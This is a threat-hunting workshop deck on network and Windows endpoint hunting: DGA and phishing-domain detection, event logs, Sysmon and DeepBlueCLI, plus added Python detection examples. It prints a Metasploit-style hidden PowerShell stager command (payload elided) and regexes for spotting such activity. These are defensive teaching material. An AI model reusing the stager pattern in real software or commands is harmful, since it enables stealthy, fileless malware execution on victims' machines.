Endpoint & Network Threat Hunting

The document discusses endpoint and network threat hunting. It provides an introduction to threat hunting, describing the cyber attack process and adversaries. It discusses moving from pure prevention to breach resilience and the procedures of threat hunting, including creating hypotheses, investigating logs, identifying attack patterns and tactics, and correlating information. Methodologies covered include discovery and collection from real-time monitoring, on-demand collection, and querying, as well as analysis techniques like forensic state analysis, behavior analysis, and historical searches. The document emphasizes network threat hunting, explaining why networks should be hunted and examples of anomalies to look for, such as abnormal outbound traffic and login patterns.

ENDPOINT & NETWORK THREAT HUNTING

United Tractor
13 February 2020
Yohanessyailendra at gmail dot com
#WHOAMI
Yohanes Syailendra, M.Kom, CREST (CPSA), CEI, ECSA, CEH
• Cyber Security Geek, Especially on Malwares
• Cyber Incident Response & Threat Hunting
• Threat Intelligence Researcher
• Perform Penetration Testing for 1000+ Routers/Servers, 30+ Web/Mobile
Applications, 1000+ Application / Malware analysis & Reverse Engineering
• Perform ISO 27001 Assessment across 32+ Data Centers
• Trainer for BSSN, Kemhan, PwC, Indosat, Telkomsel
• Research team on Indonesia Honeynet Project, Malware Stream
• 2013 & 2014 & 2015 Cyber Defence Kemhan Winner
DOWNLOAD MATERIAL PRESENTATION
(WORKSHOP)

https://s.id/threathuntingunitedtractor
WORKSHOP OBJECTIVE
• This workshop will focus on and explore threat hunting activity from the network and endpoint threat hunting point of view
• Participants will receive endpoint and network threat hunting material using several methods:
• Threat Hunting from Network Perspective
• Threat Hunting from Event Logs

• Agenda:
• Introduction to Threat Hunting
• Network Threat Hunting
• Endpoint Threat Hunting
INTRODUCTION TO THREAT HUNTING
CYBER ATTACK PROCESS
[Figure: attackers ("How? Just create a malware") target the organization premises, with its web server, mail server, file server and target server, and its employees; the malware then sends the target data back out.]
Common Attacks:
• DDoS Attack
• Ransomware Attacks
• Web App Attacks (SQL/XSS/Command Injection)
• Brute Force Attacks
• Exploits SMB/HTTP
ABOUT THE ADVERSARIES

ABOUT THE ATTACK

MOVING FROM PURE PREVENTION TO BREACH RESILIENCE

DETECT -> PREVENT -> ANALYZE -> RESPOND
MONITORING VS INCIDENT RESPONSE

[Figure: a spectrum running from Security Monitoring through Threat Hunting to Incident Response, labelled "Search queries, hi-fi rules, TI" and "Event investigation, IOC extraction, retro-search".]
THREAT HUNTING VS COMPROMISE ASSESSMENT

What are the main differences between Threat Hunting and Compromise Assessment?
Basically Threat Hunting and Compromise Assessment are the same activity, but the main differences are:
✓ Situation & Condition: Threat Hunting -> assumes a compromise will happen; CA -> a compromise has already happened
✓ Location & Object: TH -> all objects within the organization; CA -> the selected network segment / zone suspected to be the compromised area
✓ Actor (who performs the activities?): TH -> empowered SOC team (part of the SOC team); CA -> mostly the DFIR team
ALERT BASED INVESTIGATION VS THREAT HUNTING

THREAT HUNTING ACTIVITY

CYBER KILL CHAIN VS MITRE ATT&CK
THREAT HUNTING PROCEDURES
Procedures in threat hunting:
1. Create a hypothesis
2. Investigate the logs
3. Identify attack patterns and TTPs
4. Correlate and enrich the information

To build a better hypothesis, focus on one part of the Cyber Kill Chain that you want to hunt.
THREAT HUNTING METHODOLOGY
DISCOVERY AND COLLECTION METHODS
• Real-Time Monitoring
– Log endpoint activity to a central server (e.g. Sysmon+ELK, HIDS, EDR, Event Log, osquery)
– Network Collection (Packet, Log, Flow):
➢ Packet Capture
➢ Network Flow
➢ Logs from Network Devices / Network Security Devices: IDS / IPS, FW, Proxy, DNS, WAF, NGFW, UTM, etc.

• On-Demand Collection (one-time or periodic)
– Collect artifacts and information related to system state (Forensic Triage)
➢ e.g. process lists, autoruns, shimcache entries, forensic artifacts, etc.

• Query - Ask specific questions or look for a specific IOC
– Real-time: Reach down to the endpoint directly (e.g. osquery, GRR, Velociraptor, MozDef)
– Non Real-Time: Search pre-collected logs or data (e.g. EDR)
HUNT METHODOLOGIES
Historical Search (Source: Alerts)
  Search for indicators missed via historical search of logs and/or alert data
  Query (IoC) -> Event Match

Behavior Analysis (Source: Logs)
  Search for patterns of behavior based on known attacker tactics (TTPs)
  Query (TTP) -> Pattern Match
  Find anomalies relative to baselined profiles and user behavior
  Baseline -> Deviation from Normal

State Analysis (Source: Forensics)
  Deep host inspection to identify what is on each system
  Forensic Triage -> Artifacts and/or Malware
ANALYSIS: FORENSIC STATE ANALYSIS
Utilizing data stacking and hunt analysis methods:

1. Review all running processes and loaded modules -> Current look
2. Review all autorun entries and locations -> Future look
3. Review all execution & forensic artifacts -> Historical look
4. Identify any evidence of host manipulation or indications of generic compromise
5. Review recent privileged account usage
ANALYSIS TECHNIQUE (FORENSIC STATE ANALYSIS)
Threat hunting technique that applies phased levels of analysis to collected data to reduce the data set to a manageable level:

1. Enrichment - Reputation & threat intel lookups
2. Triage – Algorithms & methods to categorize interesting things
a. Data Stacking
b. Anomaly/Outlier Identification
3. Advanced Analysis
a. Static/Dynamic Analysis of Interesting Samples
b. TTP Pattern Matching (dig into logs)
Why Can’t My Prevention & Real Time Monitoring Tools Do This?
THREAT HUNTING VS PROTECTION
Why most protection tools make poor hunt tools:
• Prevention and real-time detection solutions (AV/IDS) strive for low False Positive (FP) alerting
• Hunt solutions widen the aperture and seek low False Negatives (FN)
– For Hunters: anomalies, outliers, and suspicious activity are leads, not FPs to be tuned out
– A good hunt solution sorts and scores leads; enables a quick path to verify and investigate to a conclusion
NETWORK THREAT HUNTING

WHY HUNT ON THE NETWORK

• Known bad network IOCs are short-lived
• IPs change - SaaS has made it easier to migrate to new infrastructure
• Domains change - Domain registration has gotten simpler (little or no validation), cheaper (tons of new TLDs) and stealthy (WHOIS privacy services)
• Instead, find unknown bad from higher order signals and patterns
NETWORK THREAT HUNTING
• Learn all the normal conditions of your network. Every network is UNIQUE.
• Find anomalies in the network's condition. Examples of conditions to look at:
• Anomalous outbound traffic (a server sending particular traffic to the internet)
• Anomalies in authenticated user accounts
• Anomalies in access by geography
• Anomalies in user login => repeated access attempts on an account
• Anomalies in database reads (SELECT) (during data exfiltration)
• Anomalies in (large) HTML responses
• Access to very many services at the same time
• Application ports that are used when they should not be (e.g. DNS traffic over port 80)
• Anomalous changes to the registry or file system
• Anomalies in DNS requests

FAST FLUX (BENIGN)

Domain | # IPs | Owner of IP space
prod-w.nexus.live.com.akadns.net. | 21 | microsoft informatica ltda, microsoft corp, microsoft corporation
www-google-analytics.l.google.com. | 26 | google inc
sync.teads.tv. | 21 | amazon.com inc, amazon technologies inc, amazon data services ireland limited
prodlb01-1956114858.eu-west-1.elb.amazonaws.com. | 19 | amazon data services ireland ltd, amazon web services, elastic compute cloud ec2 eu, amazon.com inc, amazon technologies inc, dub5 ec2
ap.gslb.spotify.com. | 25 | spotify ltd, spotify ab
profile.ess-apple.com.akadns.net. | 23 | apple inc

FAST FLUX (MALICIOUS)

Domain | # IPs | CC distribution | Owner of IP space
ahmdallame.no-ip.biz | 34 | iq, fr | dynamic ip pool, earthlink ltd. communications & internet services
liiion999.zapto.org | 45 | fr, ma, it, us, hu, at, ro, mx | edis infrastructure in france, mexico server, telentia enterprise customer, amplusnet srl, micfo llc., serverastra kft, india server, dynamic ip pool, adsl_maroc_telecom, psinet inc, national computer systems co
liiion777.zapto.org | 50 | fr, ma, us, hu, at, nl, ro, mx | dynamic ip pool, mexico server, maroctelecomasdl, edis infrastructure in spain, telentia enterprise customer, amplusnet srl, serverastra kft., india server, leaseweb netherlands b.v., adsl_maroc_telecom, psinet inc.

False positive: *.pool.ntp.org is also hosted on diverse IP address space

DOMAIN GENERATION ALGORITHM (DGA)

“Algorithmically generate a large number of domain names, to serve as C&C servers”

• Thousands of potential domains per day
• Botnet controller only needs to register one of them to keep the lights on

DGA - FEATURES
• Features
• Entropy
• Length
• Vowel to consonant ratio
• Longest consonant sequence
• ngrams from Alexa top domains 2LDs
• ngrams from English dictionary
• RandomForestClassifier
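The feature set listed above, as an added example that is not from the slides: each feature is computed on the second-level label, and a hand-tuned voting rule stands in for the RandomForestClassifier (an assumption, as are the small n-gram lists, which are constructed stand-ins for the Alexa 2LD and English dictionary sources).

```python
import math
import re
from collections import Counter

VOWELS = set("aeiou")
CONSONANT_RUN = re.compile(r"[b-df-hj-np-tv-z]+")

# Constructed stand-ins for the slide's n-gram sources (Alexa top 2LDs, English
# dictionary). A real deployment builds these from the full lists.
BENIGN_2LDS = ["google", "facebook", "microsoft", "amazon", "spotify", "apple",
               "wikipedia", "youtube", "twitter", "linkedin", "netflix", "live"]
ENGLISH_WORDS = ["together", "party", "difference", "summer", "woman", "experience",
                 "every", "begin", "period", "single", "smoke", "mountain", "matter",
                 "gentleman", "although", "perhaps"]


def trigrams(word):
    return {word[i:i + 3] for i in range(len(word) - 2)}


def trigram_set(words):
    grams = set()
    for w in words:
        grams |= trigrams(w)
    return grams


BENIGN_GRAMS = trigram_set(BENIGN_2LDS)
ENGLISH_GRAMS = trigram_set(ENGLISH_WORDS)


def second_level_label(domain):
    # Simplification (assumption): the label before the final label is the 2LD.
    # Right for .fr/.uk/.com, wrong for public suffixes such as .co.uk.
    labels = domain.rstrip(".").lower().split(".")
    return labels[-2] if len(labels) >= 2 else labels[0]


def shannon_entropy(s):
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in Counter(s).values()) if n else 0.0


def trigram_coverage(s, grams):
    """Fraction of the label's trigrams that occur in a reference n-gram set."""
    parts = [s[i:i + 3] for i in range(len(s) - 2)]
    return sum(p in grams for p in parts) / len(parts) if parts else 0.0


def dga_features(domain):
    label = second_level_label(domain)
    vowels = sum(ch in VOWELS for ch in label)
    consonants = sum(ch.isalpha() and ch not in VOWELS for ch in label)
    runs = CONSONANT_RUN.findall(label)
    return {
        "length": len(label),
        "entropy": shannon_entropy(label),
        "vowel_consonant_ratio": vowels / consonants if consonants else float(vowels),
        "longest_consonant_run": max((len(r) for r in runs), default=0),
        "benign_trigram_coverage": trigram_coverage(label, BENIGN_GRAMS),
        "english_trigram_coverage": trigram_coverage(label, ENGLISH_GRAMS),
    }


def heuristic_verdict(domain):
    """Hand-tuned rule standing in for the slide's RandomForestClassifier (assumption):
    each feature casts one vote; two or more votes means DGA."""
    f = dga_features(domain)
    votes = sum([
        f["entropy"] > 3.0,
        f["longest_consonant_run"] >= 4,
        f["vowel_consonant_ratio"] < 0.3,
        f["benign_trigram_coverage"] < 0.3 and f["english_trigram_coverage"] < 0.3,
    ])
    return "DGA" if votes >= 2 else "Benign"
```

Word-list domains such as perhapstogether.net from the false-negative slide score Benign here as well, which is exactly the blind spot these character-level features have against dictionary-based DGAs.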

DGA (TRUE POSITIVES)

Cryptolocker (96.4% accuracy) | Verdict | Confidence
vobrbjlloae.fr | DGA | 0.92
sgnuqrek.uk | DGA | 0.84
dkoudkavtnjc.tf | DGA | 0.97
kspruxe.uk | DGA | 0.62
qalhanhhsockuxj.yt | DGA | 0.96
wtjawjv.nl | DGA | 0.64

Tiny Banker (98.2% accuracy) | Verdict | Confidence
sdprjrntgvlw.ru | DGA | 0.98
fnetiyouqksr.xyz | DGA | 0.96
cpowrnbskkxt.xyz | DGA | 0.99
pmiioppkqrvw.pw | DGA | 0.98
brstpvrtkcpp.com | DGA | 0.97
htschinwcghk.com | DGA | 0.86

DGA (FALSE NEGATIVE)

Domain | Verdict | Confidence
perhapstogether.net | DGA | 0.52
partydifference.net | DGA | 0.58
summerdifference.net | DGA | 0.53
womandifference.net | DGA | 0.53
gentlemanalthough.net | DGA | 0.52
experienceevery.net | Benign | 0.52
beginevery.net | Benign | 0.76
partyperiod.net | Benign | 0.69
smokesingle.net | Benign | 0.69
mountainmatter.net | Benign | 0.53
mountainapple.net | Benign | 0.73

NXDOMAIN
• Thousands of DGA domains are queried but only a few resolve
• Normally NXDOMAINs come from typos, copy-paste errors and browser prefetch, and make up less than 5% of the traffic
Malware Family | NXDOMAIN ratio
Cryptolocker | 2.07
Nivdort | 13.58
Telsacrypt | 14.38

FALSE POSITIVE
Domain | Class | Probability
qetdjnndqo.c*****1.org. | DGA | 0.83
mjhhofjsdrsulcn.c*****1.org | DGA | 0.96
hicbaxevoldlszl.c*****1.org | DGA | 0.96
bchbnajexhspfrq.c*****1.org | DGA | 0.97
mbgmajnvrvyn.c*****1.org | DGA | 0.96
nlbvxhfomxx.c*****1.org | DGA | 0.95
• DGA-like domains
• Most of them NXDOMAINs
• WHOIS privacy proxy

Chrome DNS wildcard detection!

PHISHING DETECTION
Real website | Fake site
facebook.com | facebookc.om
malware.com | rnalware.com
apple.com | applesoftupdate.com
paypal.com | paypal.com.user.accounts.lwproductions.net

• “Edit distance: number of operations like removal, insertion or substitution of characters that converts one string to the other”
• Longest common substring: use a suffix tree
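Both measures from the slide, as an added example that is not part of the original deck: Levenshtein edit distance catches typo-squats such as facebookc.om, and longest common substring catches a brand label embedded in a longer hostname such as the paypal.com.user.accounts… case. A dynamic-programming LCS replaces the suffix tree the slide mentions, and the "last two labels are the registered domain" rule is a simplification.

```python
# Brand list taken from the slide's "Real website" column.
BRANDS = ["facebook.com", "malware.com", "apple.com", "paypal.com"]


def edit_distance(a, b):
    """Levenshtein distance: minimum insertions, deletions and substitutions."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def longest_common_substring(a, b):
    """O(n*m) dynamic programme; the slide suggests a suffix tree for scale."""
    best_len, best_end = 0, 0
    prev = [0] * (len(b) + 1)
    for i in range(1, len(a) + 1):
        cur = [0] * (len(b) + 1)
        for j in range(1, len(b) + 1):
            if a[i - 1] == b[j - 1]:
                cur[j] = prev[j - 1] + 1
                if cur[j] > best_len:
                    best_len, best_end = cur[j], i
        prev = cur
    return a[best_end - best_len:best_end]


def registered_domain(fqdn):
    # Simplification (assumption): the last two labels form the registered domain.
    labels = fqdn.rstrip(".").lower().split(".")
    return ".".join(labels[-2:])


def lookalike_check(candidate, brands=BRANDS, max_distance=2, min_common=5):
    """Return (brand, reason) if the candidate looks like a brand domain, else None.

    Edit distance is measured on the registered domain (typo-squats); the longest
    common substring is measured between the full hostname and the brand label,
    so a brand name buried in subdomains of another registered domain is caught.
    """
    cand = candidate.rstrip(".").lower()
    cand_reg = registered_domain(cand)
    for brand in brands:
        if cand_reg == brand:
            return None  # the genuine site
        d = edit_distance(cand_reg, brand)
        if d <= max_distance:
            return (brand, f"edit distance {d} from {brand}")
        label = brand.split(".")[0]
        common = longest_common_substring(cand, label)
        if len(common) >= min_common:
            return (brand, f"shares '{common}' with {brand} but is registered as {cand_reg}")
    return None
```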

NEXT STEPS?

• Validate outliers
• New or consistent behavior?
• How many hosts?
• How many models triggered?
• Identify the user(s)/process generating the traffic, assess maliciousness
• If malicious, kick off the DFIR process

ONE MORE THING

• Every network is different, find out what’s normal for yours
• Maintain a list of newly observed domains in your network
• Segment your network by the source of outliers
WHAT TO LOOK FOR IN THE NETWORK
Hypothesize that all network activity is encrypted or obfuscated
• Reconnaissance
• The attacker identifies the network and enumerates services

• Weaponization
• An endpoint downloads a malicious module

• Delivery
• An endpoint downloads malware / clicks URLs

• Exploitation
• The attacker attacks the endpoint (exploit)
WHAT TO LOOK FOR IN THE NETWORK (CONTD.)
• Lateral Movement Activities
• Malware / the attacker infects other endpoints within the network

• CnC Communication
• Malware contacts its C2 server (foreign domain / foreign IP address / foreign protocol)

• Data Exfiltration
• Malware / the attacker sends data out of the network (foreign domain / foreign IP address / foreign protocol)
LOOK INTO ATT&CK FOCUS ON NETWORK
PREREQUISITE TO DO NETWORK THREAT HUNTING
• Detailed raw network access (PCAP)
• NetFlow
• Network logs (from IDS / firewalls / IPS)
• Correlated data using a SIEM
• Threat intelligence data (malicious domains, malicious IP addresses, bad hash values)
• Easiest way => a threat hunting platform
LAB PREPARATION – WIRESHARK
• Configure Wireshark so that analysis is easier
NETWORK THREAT HUNTING LAB (ATTACK PROCESS HUNTING)
Goal: find the pattern of an attack that is currently taking place in the network

Normally, enumeration and exploitation attacks can be identified by security devices (IDS or firewall). However, an attacker or malware performs lateral movement using the same methods without being detected by the (gateway) firewall.
• Identify the enumeration attack pattern (Nmap)
• Identify the exploit and payload attack pattern (Metasploit)
TIME TO HUNT!
• Install Wireshark
• Download PCAP:
• Identify:
• The host infected by malware
• The domain or IP address of the C2 server
• How lateral movement was performed (if any)
• What activities were carried out inside the network (TTPs) (if any)
• How the malware was able to get in (infiltrate) (if any)

ENDPOINT THREAT HUNTING
WHY THREAT HUNTING ON ENDPOINT?
• So what do we do?
• Agents need to be deployed FAST!!!
• Start monitoring:
• Process Creation/Termination
• Registry Access
• Process Execution
• Autoruns
• Etc
EVENT VIEWER - WINDOWS
• What?
➢ Event Viewer, a component of Microsoft’s Windows NT line of operating systems, lets administrators and users view the event logs on a local or remote machine.
• Where?
➢ Control Panel --> Administrative Tools --> Event Viewer

EVENT VIEWER - WINDOWS
• Convenient and pretty
• Works only on live systems
• Does not work on a forensics image
• We have to parse the event logs

EVENT LOGS
• Binary structure
• Header and a series of records
• Event ID formats
• http://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventid=528
• Application logs are vendor specific
• EventID.net is a good source for this info - $$$
• blogs.msdn.com/ericfiz/default.aspx
• www.microsoft.com/technet/support/ee/ee_advanced.aspx
EVENT LOG AND THREAT
• Malware and exploit frameworks have been evolving faster than common preventive technologies have kept up
o Detective controls allow more aggressive checks
• By default Metasploit creates random service names like this:
o Service Name: GWRhKCtKcmQarQUS
o Service name matches: ^[A-Za-z]{16}$
• Blocking 16 character service names containing only upper and lower alpha characters could lead to false positives
• This is how you fight, and this is how you win:
o Automatically detect these names, married with rapid incident response
THE EVOLUTION OF MALWARE AND PAYLOAD
• Often in c:\windows\system32\RanDOmNAme.exe
• Metasploit exploit target: Native upload
• Corporate malware defenses are designed to prevent this
• Newer malware and exploitation frameworks are migrating to 'fileless malware', leveraging PowerShell for post exploitation
• They avoid using .ps1 files, and load the code via (very long) command lines, or use the PowerShell WebClient.DownloadString method
• Metasploit exploit target PowerShell uses a long compressed and base64-encoded PowerShell function loaded via cmd.exe
UH… OH…
• C:\Windows\system32\cmd.exe /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''[gzip+base64 blob elided]''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);
DETAILS

• Command is > 2400 bytes
• powershell.exe launched via cmd.exe
• Hidden PowerShell window
• gzip compressed and Base64 encoded PowerShell function
o To analyze: decode base64, and then decompress with gzip
o Result: obfuscated PowerShell function
ADVANTAGES OF THE TECHNIQUE FOR THE ATTACKER
• Antivirus will allow cmd.exe and powershell.exe to execute
• There are no files saved to the disk to scan
• If the system is using application whitelisting: cmd.exe and powershell.exe will be whitelisted
• Restricting execution of .ps1 files via Set-ExecutionPolicy settings has no effect
o "Set-ExecutionPolicy is not a Security Control" - @Ben0xA, DerbyCon 2016
• There is no logging of process command lines or PowerShell commands by default
• Preventive and detective controls tend to allow and ignore these methods
COMMAND LINE TO LOOK FOR (HUNTING HYPOTHESIS)
• Loooooooooong commands (1,000+ bytes)
• csc.exe (C# compiler)
• cvtres.exe (Resource File To COFF Object Conversion Utility)
• rundll32.exe and cscript.exe
• .vbs scripts
• schtasks and at
• Anything launched from a temp folder
• Launching PowerShell via cmd.exe
• Base64 encoded commands
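As an added example (not from the slides), the hunting hypotheses above, the Metasploit service-name regex from the EVENT LOG AND THREAT slide and the base64-then-gunzip analysis step from DETAILS, applied to constructed process-creation and service-install events. The event field names, the sample events and the harmless compressed "payload" are assumptions made for this example.

```python
import base64
import gzip
import re

# Hunting hypotheses from the slides, as checks over process-creation events
# (Sysmon event 1 / Security 4688 with command-line logging) and service-install
# events (System 7045). Field names below are assumptions for this example.
METASPLOIT_SERVICE_NAME = re.compile(r"^[A-Za-z]{16}$")   # regex from the slide
LONG_COMMAND_BYTES = 1000
INTERESTING_IMAGES = {"csc.exe", "cvtres.exe", "rundll32.exe", "cscript.exe",
                      "schtasks.exe", "at.exe"}
TEMP_FOLDER = re.compile(r"\\(temp|tmp)\\", re.IGNORECASE)
VBS_SCRIPT = re.compile(r"\.vbs\b", re.IGNORECASE)
BASE64_BLOB = re.compile(
    r"(?:FromBase64String\(['\"]+|-(?:e|ec|enc|encodedcommand)\s+)([A-Za-z0-9+/=]{40,})",
    re.IGNORECASE)


def basename(path):
    return path.lower().rsplit("\\", 1)[-1]


def hunt_process_event(event):
    """Return the list of hunting hypotheses this process-creation event matches."""
    cmd = event.get("command_line", "")
    image, parent = basename(event.get("image", "")), basename(event.get("parent_image", ""))
    hits = []
    if len(cmd.encode("utf-8")) >= LONG_COMMAND_BYTES:
        hits.append("long command line")
    if image in INTERESTING_IMAGES:
        hits.append(f"interesting image {image}")
    if VBS_SCRIPT.search(cmd):
        hits.append(".vbs script")
    if TEMP_FOLDER.search(event.get("image", "")):
        hits.append("launched from temp folder")
    if image == "powershell.exe" and parent == "cmd.exe":
        hits.append("powershell via cmd.exe")
    if BASE64_BLOB.search(cmd):
        hits.append("base64 encoded command")
    return hits


def is_metasploit_style_service(service_name):
    return bool(METASPLOIT_SERVICE_NAME.match(service_name))


def decode_gzip_base64(blob):
    """The slide's analysis step: base64-decode, then gunzip, to recover the script."""
    return gzip.decompress(base64.b64decode(blob)).decode("utf-8", errors="replace")


def extract_encoded_payload(command_line):
    m = BASE64_BLOB.search(command_line)
    return decode_gzip_base64(m.group(1)) if m else None


# Constructed sample data. The "payload" is a harmless string compressed and
# encoded the same way the slide's command line embeds its function.
HARMLESS_SCRIPT = "Write-Host 'constructed harmless payload'"
SAMPLE_BLOB = base64.b64encode(gzip.compress(HARMLESS_SCRIPT.encode())).decode()
EVENTS = [
    {"image": r"C:\Windows\System32\notepad.exe", "parent_image": r"C:\Windows\explorer.exe",
     "command_line": r"notepad.exe C:\Users\bob\notes.txt"},
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Windows\System32\cmd.exe",
     "command_line": "powershell.exe -nop -w hidden -c $s=New-Object IO.MemoryStream(,"
                     f"[Convert]::FromBase64String(''{SAMPLE_BLOB}''));IEX (...)"},
    {"image": r"C:\Users\bob\AppData\Local\Temp\setup.exe",
     "parent_image": r"C:\Windows\System32\cmd.exe",
     "command_line": "setup.exe " + "A" * 1100},
    {"image": r"C:\Windows\System32\cscript.exe", "parent_image": r"C:\Windows\explorer.exe",
     "command_line": r"cscript.exe //B C:\Users\bob\AppData\Local\Temp\update.vbs"},
]
```

Each hit is a lead to validate, not a verdict: csc.exe and schtasks.exe are normal on build and admin hosts, so stack the hits per host and per parent process against your baseline before escalating.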
POWERSHELL LOGGING
• PowerShell 2 (Windows 7) has very little logging capability
• PowerShell 5+ includes multiple methods for logging PowerShell activity (not enabled by default)
• Event 4103 (Module Logging) is very helpful
• PowerShell 2 can be upgraded to PowerShell 5.1 (released with the Windows 10 Anniversary Update) in one step
• Upgrade all Windows systems to PowerShell 5+
MICROSOFT SYSMON
• Could ease introduction into some environments
• Integrates cleanly into most SIEM or Windows Event Collection environments by logging to the Windows Event Log:
• Applications and Services Logs/Microsoft/Windows/Sysmon/Operational
• Sysmon can automatically generate hashes of all (or selected) binaries that run on a system
• Allows submission to services such as VirusTotal
• Or a belt-and-suspenders detective whitelisting process…
SYSMON CAPABILITIES

INTRODUCING DEEPBLUECLI FOR THREAT HUNTERS
• DeepBlueCLI (PowerShell version) runs on PowerShell 3.0 or higher
o Can process PowerShell 4.0/5.0 event logs
o DeepWhite requires PowerShell 4+
• Processes local event logs, or evtx files
o Either feed it evtx files, or parse the live logs via Windows Event Log collection
• DeepBlueCLIv2 outputs PowerShell objects
o May be piped to Format-List, Format-Table, Out-GridView, ConvertTo-Csv, ConvertTo-HTML, ConvertTo-Json, ConvertTo-Xml, etc.
• Thanks for the help: Joshua Wright (@joswr1ght), John Strand (@strandjs), and Mick Douglas (@bettersafetynet).

DEEPBLUECLI SAMPLE:
• DeepBlueCLI detects a large number of suspicious behaviors

DEEPBLUECLI OUTPUT
LAB ENDPOINT THREAT HUNTING – DEEPBLUECLI FOR THREAT HUNTING
• Use DeepBlueCLI to check your Windows logs
• Open the PowerShell CLI on your Windows machine.
• Try these commands:
• PS C:\Users\User\> .\DeepBlue.ps1 -log security
• PS C:\Users\User\> .\DeepBlue.ps1 -log application
• PS C:\Users\User\> .\DeepBlue.ps1 -log system

• Use DeepBlueCLI to check the sample EVTX files:
• PS C:\Users\User\> .\DeepBlue.ps1 .\evtx\new-user-security.evtx
• PS C:\Users\User\> .\DeepBlue.ps1 .\evtx\disablestop-eventlog.evtx
• PS C:\Users\User\> .\DeepBlue.ps1 .\evtx\many-events-security.evtx
• PS C:\Users\User\> .\DeepBlue.ps1 .\evtx\many-events-application.evtx

DEEPBLUECLI FOR THREAT HUNTING LAB
• Use DeepBlueCLI to check the sample EVTX files:
• PS C:\Users\User\> .\DeepBlue.ps1 .\evtx\metasploit-psexec-native-target-security.evtx
• PS C:\Users\User\> .\DeepBlue.ps1 .\evtx\smb-password-guessing-security.evtx
• PS C:\Users\User\> .\DeepBlue.ps1 .\evtx\psattack-security.evtx
• PS C:\Users\User\> .\DeepBlue.ps1 .\evtx\mimikatz-privesc-hashdump.evtx
WINDOWS AUTORUNSC.EXE DETECTION OF MALWARE PERSISTENCE

AUTORUNSC.EXE TOOLS STEP BY STEP
1. Get an image of the disk / computer you want to analyze (use FTK Imager, dd, etc.)
2. Mount the disk image evidence from step 1 read-only
3. Run autorunsc.exe analysis against all folders mounted from the disk image evidence
4. Analyze the CSV files generated by autorunsc.exe in step 3

ANALYSIS OUTPUT FROM AUTORUNSC.EXE FOR MALICIOUS ACTIONS
ANALYSIS OUTPUT FROM AUTORUNSC.EXE TO IDENTIFY MALICIOUS
ACTIVITY FROM SYSTEM

70
ANALYSIS OUTPUT FROM AUTORUNSC.EXE TO IDENTIFY MALICIOUS
ACTIVITY FROM SYSTEM

71
ANALYSIS OUTPUT FROM AUTORUNSC.EXE TO IDENTIFY MALICIOUS
ACTIVITY FROM SYSTEM

72
ANALYSIS OUTPUT FROM AUTORUNSC.EXE TO IDENTIFY MALICIOUS
ACTIVITY FROM SYSTEM

73
ANALYSIS OUTPUT FROM AUTORUNSC.EXE TO IDENTIFY MALICIOUS
ACTIVITY FROM SYSTEM

74
ANALYSIS OUTPUT FROM AUTORUNSC.EXE TO IDENTIFY MALICIOUS
ACTIVITY FROM SYSTEM

75
ANALYSIS OUTPUT FROM AUTORUNSC.EXE TO IDENTIFY MALICIOUS
ACTIVITY FROM SYSTEM

76
ANALYSIS OUTPUT FROM AUTORUNSC.EXE TO IDENTIFY MALICIOUS
ACTIVITY FROM SYSTEM

77
“Know Your Enemy, Know Yourself, And Victory is Never in Doubt, not in a hundred battles”
- Sun Tzu -

THANK YOU
